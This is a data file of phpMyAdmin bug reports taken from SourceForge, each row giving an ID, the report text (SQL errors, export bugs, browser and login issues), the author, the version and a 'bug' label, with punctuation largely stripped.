This allows you to perform an import over multiple requests in case the PHP time limit is reached before the import completes.
However, since it works by re uploading the dump file each time until the import is complete) and resuming the import from the last line processed in your dump file, your SET SQL MODE= NO AUTO VALUE ON ZERO statement at the beginning of the file will get skipped after the first request and therefore you might see this problem even though you might think you shouldn t).
I m using PHPMyAdmin version 2.11.8.1.
Original URL https sourceforge.net p phpmyadmin bugs 2843 https sourceforge.net p phpmyadmin bugs 2843 Original author alexanderpas Found in version 2.11.8","bug"
"24444","9207","UUID ) function error.
When leave the field ID empty the UUID must set automatically the value..but return me an error..this error return from the form insert of phpmyadmin.
Maybe the WHERE is too much..and can be disable.
UPDATE `eventi`.`utenti` SET `id utenti` = UUID ) WHERE `utenti`.`id utenti` = UUID ) LIMIT 1 Messaggio di MySQL Documentazione 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ) WHERE `utenti`.`id utenti` = UUID ) LIMIT 1 at line 1 Original URL https sourceforge.net p phpmyadmin bugs 2844 https sourceforge.net p phpmyadmin bugs 2844 Original author f4b10 Found in version 3.1.3","bug"
"24444","9208","error on database designer.
hi, I would like to report a post that error occurred when export to pdf in the database Designer, please check again on the Export Import pdf schema.
thank Original URL https sourceforge.net p phpmyadmin bugs 2845 https sourceforge.net p phpmyadmin bugs 2845 Original author anakesde Found in version 3.1.3","bug"
"24444","9209","Space character missing in export query.
MySQL 5.0.45 phpMyAdmin 2.8.2.4 PHP 5.1.6 When using the copy table feature, the CREATE TABLE query is missing a space character and causes it to fail.
There should be a space character before DEFAULT CHARSET .
...ENGINE = MYISAM AUTO INCREMENT = 892DEFAULT CHARSET = utf8 PACK KEYS =0.. MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 892DEFAULT CHARSET = utf8 PACK KEYS =0 at line 21 Original URL https sourceforge.net p phpmyadmin bugs 2846 https sourceforge.net p phpmyadmin bugs 2846 Original author rpaccard","bug"
"24444","9210","wrong error msg ..session.gc maxlifetime... wrong error msg Your PHP parameter session.gc maxlifetime is lower that cookie validity configured in phpMyAdmin, ... must be session.gc maxlifetime instead, important for php value in .htaccess for example took me a while to find out what was wrong!)
Original URL https sourceforge.net p phpmyadmin bugs 2847 https sourceforge.net p phpmyadmin bugs 2847 Original author windkiel Found in version Latest Git","bug"
"24444","9211","Structure export Null always YES.
The export in latex data is wrong,..
The export will allways export NULL=YES.
Original URL https sourceforge.net p phpmyadmin bugs 2848 https sourceforge.net p phpmyadmin bugs 2848 Original author plbaasch","bug"
"24444","9212","WHERE CONVERT... causing slowdown when editing a record.
Hi, First, I m running an older version of phpmyadmin 2.11.5.1), so perhaps you have fixed this already.
Anyway, I have a table in my db that looks something like with some columns removed to keep this brief) CREATE TABLE `books` `isbn` varchar 13) NOT NULL, `title` varchar 255) NOT NULL, `author` varchar 255) default NULL, PRIMARY KEY `isbn`), ) ENGINE=InnoDB DEFAULT CHARSET=utf8 It has about 1.2 million rows.
Browsing searching for a record in phpmyadmin works fine, but when I click the pencil icon to edit the record, it takes forever for the page to load.
So I looked on my db and it is stuck running this query SELECT FROM `my db`.`books` WHERE CONVERT `books`.`isbn` USING utf8) = 9781847194183 This particular query takes several minutes to run.
It appears that it is running CONVERT on every row.
The query finishes in milliseconds if the CONVERT part is removed.
Original URL https sourceforge.net p phpmyadmin bugs 2849 https sourceforge.net p phpmyadmin bugs 2849 Original author cswilliams Found in version 2.11.5.1","bug"
"24444","9213","Checkbox Javascript and some Firefox extensions.
A number of Firefox extensions, including Checkfox https addons.mozilla.org en US firefox addon 2393 ) and CheckBoxMate https addons.mozilla.org en US firefox addon 9740 ), attempt to simplify the task of selecting multiple checkboxes by allowing the user to perform some variant of drag and drop to select them.
phpMyAdmin s checkbox Javascript is incompatible with not one but ALL of these, as well as any right click context menus that can be displayed over checkboxes, which makes other tools like Firebug relatively useless as well.
The inability to use these kinds of tools can be a major drain on productivity I ve spent countless hours debugging table creating scripts, where the script creates a bunch of tables, and then I have to click click click click a hundred times to delete them all and try again.
It appears that some Javascript that phpMyAdmin is loading and I didn t investigate too closely to see the source of the problem, sorry) is capturing the mouse events over the checkboxes and incorrectly propagating them.
This problem existed in phpMyAdmin since v2.6.0 and continues to exist in v3.1.3.
All versions of Firefox at least 2.0 and 3.0) are affected.
I upgraded to phpMyAdmin v3.1.3 today in hopes that it would fix this long standing issue, and sadly, it did not.
To reproduce the problem 1\.
Install Firefox v3.0 http www.mozilla.com ).
2\.
Install CheckBoxMate v0.2 https addons.mozilla.org en US firefox addon 9740 ).
3\.
Open phpMyAdmin v3.1.3 in Firefox, and navigate to a page with many checkboxes.
4\.
Press the mouse button down over a checkbox, and with the button held down, drag the mouse over the other checkboxes.
Result Only the first checkbox will be checked; all others will not be, even though CheckBoxMate is sending click messages to the other checkboxes.
Expected behavior All checkboxes under the selection rectangle will be checked by the click messages being sent by CheckBoxMate.
Original URL https sourceforge.net p phpmyadmin bugs 2850 https sourceforge.net p phpmyadmin bugs 2850 Original author phantom inker Found in version 3.1.3","bug"
"24444","9214","Invalid Content Encoding header.
Under certain circumstances, version 3.1.3.1 of phpMyAdmin can issue the following response header when a user requests the export of a gzipped file Content Encoding x gzip See, e.g., line 291 in phpMyAdmin 3.1.3.1 english export.php).
This is not correct behaviour.
Valid tokens for use in Content Encoding headers are mentioned in RFC 2616 [ 1] and administered by the IANA [ 2].
x gzip is not one of them.
In some circumstances, a gzip token can be specified in this header, but only when using gzip content coding regardless of whether or not the document being transmitted is a gzipped archive).
Strangely, it appears that this Content Encoding header is only sent when gzip content coding is inactive .
It would make more sense to omit the Content Encoding header and disable PHP s zlib output compression for the transmission of gzipped files.
If it is not possible to disable PHP s zlib functions, then there is no point altering the Content Encoding response header.
A simple Content Type application x gzip will suffice.
[ 1] http www.w3.org Protocols rfc2616 rfc2616 sec3.html sec3.5 [ 2] http www.iana.org assignments http parameters Original URL https sourceforge.net p phpmyadmin bugs 2851 https sourceforge.net p phpmyadmin bugs 2851 Original author philronan Found in version 3.1.3","bug"
"24444","9215","Add Fields Add index is missing quotes.
ALTER TABLE `categories` ADD `left` INT UNSIGNED NOT NULL AFTER `title` , ADD `right` INT UNSIGNED NOT NULL AFTER `left` , ADD INDEX LEFT , RIGHT ) MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near left, right) at line 1 ADD INDEX LEFT , RIGHT ) Should Be ADD INDEX `left` , `right` ) Original URL https sourceforge.net p phpmyadmin bugs 2852 https sourceforge.net p phpmyadmin bugs 2852 Original author lukearmstrong","bug"
"24444","9216","CheckConfigurationPermissions = false is worthless.
It s no use to set CheckConfigurationPermissions to false, because the default configuration .
libraries config.default.php) is read and PROCESSED before .
config.inc.php.
This causes problems on mounted NTFS volumes under Linux.
I m currently using 3.1.3.1) Original URL https sourceforge.net p phpmyadmin bugs 2853 https sourceforge.net p phpmyadmin bugs 2853 Original author pasthelod","bug"
"24444","9217","Using textarea CharEditing drops default values.
When the config is edited to use textarea for char varchar editing, i.e.
the following line is added cfg[ CharEditing ] = textarea ; Then default values are ignored for insertion.
Tested with NULL and NOT NULL, and in each case the insert field is blank, and a blank string is inserted for the record.
Tested on Chrome and Firefox for phpmyadmin 3.1.1.
Original URL https sourceforge.net p phpmyadmin bugs 2854 https sourceforge.net p phpmyadmin bugs 2854 Original author breathmint Found in version 3.1.1","bug"
"24444","9218","Privileges SQL Error with MySQL 5.1.33.
Hi, when I view a database and click Privileges I get the following error SQL query DocumentationEdit SELECT `User`, `Host`, `Select priv`, `Insert priv`, `Update priv`, `Delete priv`, `Create priv`, `Drop priv`, `Grant priv`, `Index priv`, `Alter priv`, `References priv`, `Create tmp table priv`, `Lock tables priv`, `Create view priv`, `Show view priv`, `Create routine priv`, `Alter routine priv`, `Execute priv`, `Event priv`, `Trigger priv`, `Db` FROM `mysql`.`db` WHERE mysql LIKE `Db` AND NOT `Select priv` = N AND `Insert priv` = N AND `Update priv` = N AND `Delete priv` = N AND `Create priv` = N AND `Drop priv` = N AND `Grant priv` = N AND `References priv` = N AND `Create tmp table priv` = N AND `Lock tables priv` = N AND `Create view priv` = N AND `Show view priv` = N AND `Create routine priv` = N AND `Alter routine priv` = N AND `Execute priv` = N AND `Event priv` = N AND `Trigger priv` = N )) UNION SELECT `User`, `Host`, `Select priv`, `Insert priv`, `Update priv`, `Delete priv`, `Create priv`, `Drop priv`, `Grant priv`, `Index priv`, `Alte[...] MySQL said Documentation 1054 Unknown column Event priv in field list I am using phpmyadmin 3.1.3.1 mysql 5.1.33 and php 5.2.9 If I click Privileges on the server screen it works fine.
Regards Rowan Original URL https sourceforge.net p phpmyadmin bugs 2855 https sourceforge.net p phpmyadmin bugs 2855 Original author obsidiandh Found in version 3.1.3","bug"
"24444","9219","header already sent complaints setup).
sorry, I was not able to edit my own buggy setup lib common.inc.php ID 2468811 report why only fixed in trunk??
tons of header already sent complaints in IRC and the help forum ... most resulting from date default timezone get ) errors, see http www.ipix.lt images 17973574.png for example) Original URL https sourceforge.net p phpmyadmin bugs 2856 https sourceforge.net p phpmyadmin bugs 2856 Original author windkiel Found in version 3.1.3","bug"
"24444","9220","table browser wont show table.
The following create table query will create a table but not display it in the left side database table browser.
Is there something magic about the name `sponsors`?
phpMyAdmin SQL Dump version 2.11.9.4 http www.phpmyadmin.net Host localhost Generation Time Apr 13, 2009 at 11 05 AM Server version 5.0.67 PHP Version 5.2.6 SET SQL MODE= NO AUTO VALUE ON ZERO ; Database `betterle main` Table structure for table `sponsors` CREATE TABLE IF NOT EXISTS `sponsors` `id` int 11) NOT NULL auto increment, `name` varchar 255) NOT NULL, `product category` int 11) NOT NULL, `contact` varchar 255) NOT NULL, `address` varchar 255) NOT NULL, `city` varchar 255) NOT NULL, `state` varchar 255) NOT NULL, `zip` varchar 25) NOT NULL, `email` varchar 255) NOT NULL, `phone` varchar 25) NOT NULL, `fax` varchar 25) NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; Original URL https sourceforge.net p phpmyadmin bugs 2857 https sourceforge.net p phpmyadmin bugs 2857 Original author tylerjwilk Found in version 2.11.9.x","bug"
"24444","9221","Cannot use delete, edit or sort button.
When i try to sort tables in phpmyadmin by clicking on the, by example, ID column it won t sort.
Also when i try to delete a records by clicking the X button in phpmyadmin it won t delete the record.
The same for the edit button.
When i click one of the button, the page submits the request but keeps on loading until a time out appears.
Original URL https sourceforge.net p phpmyadmin bugs 2858 https sourceforge.net p phpmyadmin bugs 2858 Original author valuco Found in version 3.1.3","bug"
"24444","9222","Query on SQL not work in 3.1.4 rc1.
If i do some query in SQL on pma 3.1.4 rc1 now show the result, the same query in the same server with pma 3.1.3.2 work correctly Original URL https sourceforge.net p phpmyadmin bugs 2859 https sourceforge.net p phpmyadmin bugs 2859 Original author fantu Found in version 3.1.4","bug"
"24444","9223","ON UPDATE property of foreign key ist omited.
Whenever I create a foreign key and set both the ON DELETE and the ON UPDATE field to CASCADE , the resulting SQL Statement is the following ALTER TABLE `wms pages` ADD FOREIGN KEY `template id` ) REFERENCES `tourvital`.`wms templates` `id` ) ON DELETE CASCADE ; Now only the ON DELETE ist set to CASCADE and ON UPDATE ist empty.
When I set ON UPDATE to CASCADE again and do another submit, it results in the following right) SQL statement ALTER TABLE `wms pages` DROP FOREIGN KEY `wms pages ibfk 2` ; ALTER TABLE `wms pages` ADD FOREIGN KEY `template id` ) REFERENCES `tourvital`.`wms templates` `id` ) ON DELETE CASCADE ON UPDATE CASCADE ; This is what it should have been on the first submit!
Original URL https sourceforge.net p phpmyadmin bugs 2860 https sourceforge.net p phpmyadmin bugs 2860 Original author samy delux Found in version Latest Git","bug"
"24444","9224","Can t browse database s table page 2.
Hi guys, I am facing a curious issue with the version 3.1.3.
When i am trying to browse my database with 330 tables, i can t go to page 2, the page is loading but i m being redirected to page 1.
When i try a second time, it s working and the issue disappear as long as i keep browsing the database.
If i go back to the home and go back to the database, the problem come back.
I inspected the code with firebug and it seems that it comes from the link of the rolldown box, where you choose the page.
On the first place, there s a wrong token and then it s ok goToUrl this, navigation.php?tpos=true pos=0 db=audiofanetv4 token=99aecd2e8008a30ab409d813fde108b2 ); goToUrl this, navigation.php?tpos=true pos=0 db=audiofanetv4 token=b7ebc96ec899fadd4417a137d654b9b6 ); If you guys need any information, please ask.
Thanks a lot for your help, Regards, Original URL https sourceforge.net p phpmyadmin bugs 2861 Original author thejoy5 Found in version 3.1.3","bug"
"24444","9225","Null checkbox not unchecked when date is chosen.
I edit a recordset where a datefield has a NULL value.
The NULL checkbox is checked ... ok But now i take a Date with the Calendar Popup, the Date changes but the checkbox stay checked ... i think it should uncheck like when i insert the date with keyboard The problem is, when it stays to checked it won t change the recordset because it prefers the checkbox Original URL https sourceforge.net p phpmyadmin bugs 2862 Original author geki007 Found in version 3.1.3","bug"
"24444","9226","Incorrect Max File Size on Import.
In my php.ini file I have upload max filesize and post max size set to 500M.
I know this is large but I need it that way.
In phpMyAdmin when I click Import it displays this Max 512 kKiB) next to the file upload box.
I think whatever function your using to display file sizes breaks with large sizes.
David Original URL https sourceforge.net p phpmyadmin bugs 2863 Original author ramaboo Found in version 3.1.3","bug"
"24444","9227","INVOKER not understood by parser.
I use a phpMyAdmin SQL window to create a function with a named block DELIMITER CREATE FUNCTION f check par uid INT ) RETURNS CHAR 50) SQL SECURITY INVOKER f check BEGIN RETURN OK ; END f check; but phpMyAdmin shows an error CREATE FUNCTION f check par uid INT ) RETURNS CHAR 50 ) SQL SECURITY INVOKERf check BEGIN RETURN OK ; MySQL a rxc3xa9pondu 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 7 When I create my function directly with MySQL, there is no error.
PhpMyAdmin transforms SQL SECURITY INVOKER f check BEGIN by SQL SECURITY INVOKERf check BEGIN Original URL https sourceforge.net p phpmyadmin bugs 2864 Original author tibre44","bug"
"24444","9228","no ON UPDATE CURRENT TIMESTAMP in list.
there is no ON UPDATE CURRENT TIMESTAMP in the attribute drop down in edit structure screen there use to be one in version 2xx Original URL https sourceforge.net p phpmyadmin bugs 2865 Original author webmentors Found in version 3.1.4","bug"
"24444","9229","Table is displayed as view.
Table with name log views is incorrectly displayed as a view in phpMyAdmin interface.
phpMyAdmin 3.1.4, MySQL 5.0.45, PHP 5.
Created using CREATE TABLE IF NOT EXISTS `log views` `id` int 10) unsigned NOT NULL auto increment COMMENT View ID , `visit id` int 10) unsigned NOT NULL COMMENT Visit ID , `section id` int 10) unsigned NOT NULL COMMENT Section ID , `uri` varchar 2083) NOT NULL COMMENT URI , `ip` varchar 39) NOT NULL COMMENT IP Address , `date visited` timestamp NOT NULL default CURRENT TIMESTAMP on update CURRENT TIMESTAMP COMMENT Date Visited , PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT= View Log ; Problem seems to be interface only.
From PHP or console, table can be used as normal, but from phpMyAdmin only the view features are available.
View has to be dropped manually because phpMyAdmin generates a DROP VIEW command instead of a DROP TABLE command which fails, because there is no view).
Original URL https sourceforge.net p phpmyadmin bugs 2866 Original author wizardofthekeys Found in version 3.1.4","bug"
"24444","9230","After login failed requires page refreshing.
Hello everyone, We were using phpMyAdmin for many years.
After upgrading it to 3.1.1 we got a couple of issues Today I ve upgraded it to 3.1.4 but issues remains).
Here is the scenario how we get one of them 1\.
Downloading phpMyAdmin 3.1.4 all languages.tar.gz 2\.
Ungunzip, untar the package 3\.
Chown R www server user www server group path to phpMyAdmin 4\.
copy config.sample.inc.php to config.inc.php 5\.
filling blowfish secret, cause we re using cookie based authentication.
changing server host from localhost to a different, cause our DB is in different server.
6\.
going to http web.server.com phpMyAdmin and entering bad username and password gt; [[[ 1045 Access denied for user ]]] error is shown.
So everything seems correct.
7\.
I m entering good username and password again and then same error is shown.
I known I ve entered good username and password this time).
So I m pressing F5 button on keyboard it didn t helped.
I m trying to refresh it clearly so I m clicking Ctrl F5 and login succeeded.
I know it s strange but I ve got no idea why this issue remains.
Maybe its specific to a server configuration?
When we were using phpMyAdmin 2.X versions there was no such problem the server configuration is still the same now).
Please let us now if we re doing something incorrectly.
Regards, Arminas Original URL https sourceforge.net p phpmyadmin bugs 2867 Original author garminas Found in version 3.1.4","bug"
"24444","9231","Renaming a field with an foreign key on it, looses the key.
If you rename a field, which is the index of a foreign key, the foreign key association gets lost.
Also you can not add or alter foreign keys on that table anymore, because the old broken foreign key is still arround an blocks you from altering the constraints.
You have to go to SQL view, get the name of the broken constraint and delete it by hand, to be able to alter the foreign key definitions of that table again.
This is pretty annoying, and confusing if you are not a foreign key pro!
;) Original URL https sourceforge.net p phpmyadmin bugs 2868 Original author samy delux Found in version 3.1.4","bug"
"24444","9232","Bug in search page.
Sorry for my bad english.
French below.
Hi, I installed PMA 5.1.4 with Apache 2.2.11, PHP 5.2.9, MySQL 5.1.34 and I found a bug in the research page.
ORDER By is always empty or the research page don t return any result whatever datas is here.
Sincerely Bonjour, J ai installxc3xa9 PMA 5.1.4 sur un serveur Apache 2.2.11, PHP 5.2.9, MySQL 5.1.34 et j ai un bug lors de la recherche.
ORDER BY est toujous vide ou la recherche ne retourne rien alors que les donnxc3xa9es sont prxc3xa9sentes.
Cordialement, Original URL https sourceforge.net p phpmyadmin bugs 2869 Original author franceserv Found in version 3.1.4","bug"
"24444","9233","Konqueror 4.2.3 and select from problem.
When using phpMyAdmin with Konqueror http auth) it fails to create correct sql.
As entering select sql or click on the table name I get SELECT FROM `address` WHERE 1 LIMIT , When I delete cookie with name phpMyAdmin problem solves SELECT FROM `address` LIMIT 0 , 30 Seen only on one computer till now.
When I delete all cookies I can run select from queries, but after closing browser, starting it again and loging in I must again delete phpMyAdmin cookie to get phpMyAdmin to work correctly.
Versions phpMyAdmin 3.1.4 manually installed) apache 2.2.11 mysql 5.0.76 r1 Konqueror 4.2.3 OS Linux Gentoo) Original URL https sourceforge.net p phpmyadmin bugs 2870 Original author urmasr","bug"
"24444","9234","database export handles views incorrectly.
When trying to export a whole database, the views in that table are exported as normal tables instead.
I couldn t find any discussion on the matter but it seems like a bug.
If phpmyadmin doesn t support views export, may it should omit them from the export so as not to give false impressions.
Original URL https sourceforge.net p phpmyadmin bugs 2871 Original author stoilis Found in version 2.11.8","bug"
"24444","9235","Website doesn t display properly with Opera.
Website doesn t display properly with Opera Original URL https sourceforge.net p phpmyadmin bugs 2872 Original author juangiordana","bug"
"24444","9236","missing file.
in the phpMyAdmin 2.11.9.5 .zip file, the file left.php is missing.
Original URL https sourceforge.net p phpmyadmin bugs 2873 Original author rhabbott4 Found in version 2.11.9.x","bug"
"24444","9237","MySQL loading 100 .
http translate.google.com translate?js=n prev= t hl=ru ie=UTF 8 u=http 3A 2F 2Fdrtro.name 2Fhacker vs hacker 2F sl=auto tl=en history state0= see this page...
Original URL https sourceforge.net p phpmyadmin bugs 2874 Original author freephp Found in version Latest Git","bug"
"24444","9238","Spelling error in comment.
I know this sounds trivial, but in file libraries sqlparser.data.php Line 01264 SERIAL , alsias for BIGINT UNSIGNED NOT NULL AUTO INCREMENT PRIMARY KEY alsias should be spelled alias .
This is present in 3.1.4 and 3.1.5 as far as I know Original URL https sourceforge.net p phpmyadmin bugs 2875 Original author jard y dooku Found in version 3.1.5","bug"
"24444","9239","IE8 Could not display rows when search a table.
IE8 reports error after search a table, and IE8 enabled the compatible mode already.
The error report Web page error details User Agent Mozilla 4.0 compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident 4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618) Timestamp Mon, 18 May 2009 06 34 58 UTC Message HTML Parsing Error Unable to modify the parent container element before the child element is closed KB927917) Line 0 Character 0 Code 0 URI https xxx.twinner.com.tw phpmyadmin tbl select.php It can be repeated in 3.1.3 Original URL https sourceforge.net p phpmyadmin bugs 2876 Original author liberc Found in version 3.1.5","bug"
"24444","9240","Cannot redeclare pma tableheader ).
I tried at http demo.phpmyadmin.net phpMyAdmin 3.3.0 dev) to optimize the database information shema.
I switched to the database, selected all 28 tables and then i selected Optimize Table.
I got in Firefox 3.0.10 the error Fatal error Cannot redeclare pma tableheader ) in srv http pma.cihar.com trunk config db structure.php on line 83 .
Original URL https sourceforge.net p phpmyadmin bugs 2877 Original author sworddragon Found in version 3.2.0","bug"
"24444","9241","Can t NULL fields anymore.
When I edit a row and I try to NULL a field I get the following javascript error rowForm.elements[ fields multi edit [ urlField ] ] is undefined Result The field is not cleared tbl change.js rowForm.elements[ fields multi edit [ urlField ] ].value = ; I don t have this issue with 3.1.5.
Thanks for your time!
Original URL https sourceforge.net p phpmyadmin bugs 2878 Original author bastiaannaber Found in version 3.2.0","bug"
"24444","9242","Inconsistent display of databases list.
1\.
Create a new user in privileges view, with no privileges 2\.
then in the dropdown select database names containing underscore character are displayed like this db\ name 3\.
Moreover.
If you add a normal database privilege there normal i.e.
without underscore char) then that database will not appear in the dropdown again, which is ok. but this is broken for those containing underscore as they appear always.
Original URL https sourceforge.net p phpmyadmin bugs 2879 Original author wardenik82","bug"
"24444","9243","Drop tab not available; user has required privileges.
Hello there, When I give a user ALL PRIVILEGES under database specific privileges username\ ) they are able to do everything ticked under their privilege parameters, except drop delete) their own databases.
They can create a database themselves but they then cannot remove it as the Drop tab is not shown.
This is very odd; I ve even tried upgrading to the beta version to check if the problem persists, but it still does the same thing.
I logged into the MySQL server via command line and typed DROP DATABASE `db name` which worked flawlessly, enforcing the fact that it s definitely a phpMyAdmin problem.
Can someone tell me what s going on here?
A fix would be greatly appreciated!
Original URL https sourceforge.net p phpmyadmin bugs 2880 Original author milosivanovic Found in version 3.2.0","bug"
"24444","9244","Login with ipv6 IP address breaks redirect.
When logging into phpmyadmin at an ipv6 IP address, the redirect upon login mangles the URL.
Specifically, it does the following http [2001 470 e130 f001 f001] phpmyadmin will redirect to http [2001 470 phpmyadmin index.php?token=\{blahblahblah\} If the correct IP address and required enclosing brackets) is restored and the page loaded presuming correct login credentials were submitted), phpmyadmin works correctly thereafter.
It is ONLY the processing of the URL for redirection immediately following a login attempt that exhibits this error.
My guess is that the URL parsing is keying off the first colon found, expecting that what follows is a port number.
Original URL https sourceforge.net p phpmyadmin bugs 2881 Original author joelnewkirk Found in version Latest Git","bug"
"24444","9245","page reload after delete broken on ipv6 via address.
When accessing phpmyadmin via ipv6 ip address whenever records are deleted, the reload of the content frame is broken, trying to reach http [2001 470 phpmyadmin instead of retaining the entire ipv6 ip address Similar to ID 2799009, it is possible that the recent fix a couple days ago Thanks!)
for that issue corrects this as well I ve not tested from subversion j Original URL https sourceforge.net p phpmyadmin bugs 2882 Original author joelnewkirk","bug"
"24444","9246","Incorrect overhead value for InnoDB.
In Structure details for an InnoDB table, a huge value is displayed for Overhead.
Original URL https sourceforge.net p phpmyadmin bugs 2883 Original author lem9 Found in version 3.1.5","bug"
"24444","9247","Setup Script 404.
The first link at http www.phpmyadmin.net documentation Documentation.html setup script gives 1\.
Server www.phpmyadmin.net 2\.
URL path documentation setup 3\.
Error notes NONE 4\.
Error type 404 5\.
Request method GET 6\.
Request query string NONE 7\.
Time 2009 06 09 20 00 57 UTC 1244577657) Original URL https sourceforge.net p phpmyadmin bugs 2884 Original author jesdisciple","bug"
"24444","9248","Undefined indexes on page after insert after query export.
After exporting the results of a query, then inserting rows using the insert page, the page returns to the tbl export page.
However, it appears that some information is lost in the process, as the section before limit and section after limit indexes are not defined on line 74 in phpMyAdmin 2.11.9) of tbl export.php afterwards.
PHP 5.2.4 MySQL 5.0.45 phpMyAdmin 2.11.9 Original URL https sourceforge.net p phpmyadmin bugs 2885 Original author gphemsley Found in version 2.11.9","bug"
"24444","9249","error on release 3.2.0 notes.
well this is not really a bug, is a type mistake on the release notes for version 3.2.0. http sourceforge.net project shownotes.php?release id=690019 where it says \ rfe 1913541 link to InnoDB status when error 1005 occurs must say \ rfe 1913541 link to InnoDB status when error 150 occurs thats all!
thanks Original URL https sourceforge.net p phpmyadmin bugs 2886 Original author vladimirprieto","bug"
"24444","9250","Notice Undefined variable k in setup index.php.
I m running 3.2.0 on PHP 5.2.9 and I m getting this when I click the Display button on the config setup page here phpmyadmin setup index.php Notice Undefined variable k in phpmyadmin setup lib ConfigFile.class.php on line 289 Original URL https sourceforge.net p phpmyadmin bugs 2887 Original author coolbru Found in version 3.2.0","bug"
"24444","9251","Extended features not available in Firefox.
I m unable to configure pma extended features using the phpmyadmin database).
I can connect to the phpmyadmin db but PMA still indicates that cfg[ Servers ][ i][ relation ] , for example, is not OK.
This is when I connect to PMA via Firefox 3.0.
If I try with Internet Explorer 6, all the requiremetns are OK and the PMA extended features are available.
It seems to be the same issue as https sourceforge.net forum forum.php?thread id=3006995 forum id=72909 Original URL https sourceforge.net p phpmyadmin bugs 2888 Original author lesouefe Found in version 3.2.0","bug"
"24444","9252","Incorrect mention of designer coords.
in http wiki.phpmyadmin.net pma Config designer coords is said about designer coords Table in which to store information for the designer feature.
DEFAULT pma designer coords but if I use the setup script in http your host path to phpMyAdmin setup that is mentioned in http wiki.phpmyadmin.net pma Quick Install The default value for Designer table is said to be designer coors .
If you don t pay close attention you could spend days looking for an error after realize taht it is only a matter of table name error Original URL https sourceforge.net p phpmyadmin bugs 2894 Original author fenderone Found in version 3.2.0","bug"
"24444","9253","Syntax error when using BTREE.
phpMyAdmin generated the following code CREATE TABLE IF NOT EXISTS `catalog category entity varchar` `value id` int 11) NOT NULL AUTO INCREMENT, `entity type id` smallint 5) unsigned NOT NULL DEFAULT 0 , `attribute id` smallint 5) unsigned NOT NULL DEFAULT 0 , `store id` smallint 5) unsigned NOT NULL DEFAULT 0 , `entity id` int 10) unsigned NOT NULL DEFAULT 0 , `value` varchar 255) NOT NULL DEFAULT , PRIMARY KEY `value id`), UNIQUE KEY `IDX BASE` `entity type id`,`entity id`,`attribute id`,`store id`) USING BTREE, KEY `FK ATTRIBUTE VARCHAR ENTITY` `entity id`), KEY `FK CATALOG CATEGORY ENTITY VARCHAR ATTRIBUTE` `attribute id`), KEY `FK CATALOG CATEGORY ENTITY VARCHAR STORE` `store id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO INCREMENT=289 ; And it should be CREATE TABLE IF NOT EXISTS `catalog category entity varchar` `value id` int 11) NOT NULL AUTO INCREMENT, `entity type id` smallint 5) unsigned NOT NULL DEFAULT 0 , `attribute id` smallint 5) unsigned NOT NULL DEFAULT 0 , `store id` smallint 5) unsigned NOT NULL DEFAULT 0 , `entity id` int 10) unsigned NOT NULL DEFAULT 0 , `value` varchar 255) NOT NULL DEFAULT , PRIMARY KEY `value id`), UNIQUE KEY `IDX BASE` USING BTREE `entity type id`,`entity id`,`attribute id`,`store id`), KEY `FK ATTRIBUTE VARCHAR ENTITY` `entity id`), KEY `FK CATALOG CATEGORY ENTITY VARCHAR ATTRIBUTE` `attribute id`), KEY `FK CATALOG CATEGORY ENTITY VARCHAR STORE` `store id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO INCREMENT=289 ; Original URL https sourceforge.net p phpmyadmin bugs 2895 Original author lathoudero Found in version 3.1.2","bug"
"24444","9254","Duplicate empty lines when exporting w o comments.
Could you remove duplicate empty lines when exporting SQL without comments?
Original URL https sourceforge.net p phpmyadmin bugs 2889 Original author olafvdspek Found in version 3.2.1","bug"
"24444","9255","Right frame is blank.
Hi there!
I host my own website on my computer Mac mini Mac OS X 10.5.7) I am running Apache 2.2.11 Unix) mod ssl 2.2.11 OpenSSL 0.9.7l DAV 2 PHP 5.2.9 MySQL 5.1.35 phpMyAdmin 3.2.0 I recently made MySQL and phpMyAdmin upgrades.
Before the upgrades, when performing a name search in the main table of my DB, if the query returned no result, the right frame displayed the warning Your SQL query returned no result and the usual content of the Search Tab ready for performing a new search.
Now, the right frame displays a blank page with only the mention ServerName DatabaseName TableName please see attached file) This occurs in Safari 3 and 4 Mac) and Firefox for Mac 3.0.11) Is this a bug or a new bad) feature in phpMyAdmin 3.2.0?
If it s a bug, how do I fix it?
Many thanks in advance for investigating!
Best regards, Gerard Original URL https sourceforge.net p phpmyadmin bugs 2890 Original author germaris","bug"
"24444","9256","session problem..
I don t know if it should call a bug or not, but I got this problem since 2.9.x.. may be earily) Sometime I use PhpMyAdmin and keep it open for a long time.
When I come back and click some table, or item...what ever.
It will redirect me to the login dialog.
sure, because I didn t access for more then 1800sec.)
But, the problem is after I re login, if I just direct click the same item e.g.
the table name or view of the table), it will bring me back to the login dialog again.
I have to go to the top page and logout once, then login again to prevent it bring me back to the login page.
Is this a bug?
or just the way it is?
Original URL https sourceforge.net p phpmyadmin bugs 2891 Original author saminjp Found in version 2.9.2","bug"
"24444","9257","Executed query not always displayed.
Insert Tab Don t know if this is really a bug or a bad!)
simplification of existing feature...
In versions previous to 3.2.0, I got the use of having my query displayed again along with the number of inserted rows and the IDs of the rows.
This was very useful to remind me, for example, which name was the last entered in the table listing the directory I manage in case I left my work for a while.
In version 3.2.0, I only get this for example) 1 row s) inserted.
Inserted row id 43375 Is it possible to re establish the query display?
Original URL https sourceforge.net p phpmyadmin bugs 2892 Original author germaris Found in version 3.2.0","bug"
"24444","9258","Cannot change a user s details.
When attempting to change a user s details host for example) by selecting to delete the old one from the user tables.
I keep getting errors such as DROP USER testuserx1blocalhost ; MySQL said Documentation 1470 String testuserx1blocalhost is too long for user name should be no longer than 16) DROP USER testuserx1b ; MySQL said Documentation 1396 Operation DROP USER failed for testuserx1b Original URL https sourceforge.net p phpmyadmin bugs 2893 Original author morphey Found in version 3.2.0","bug"
"24444","9259","Insert another new row.
This feature no longer worked.
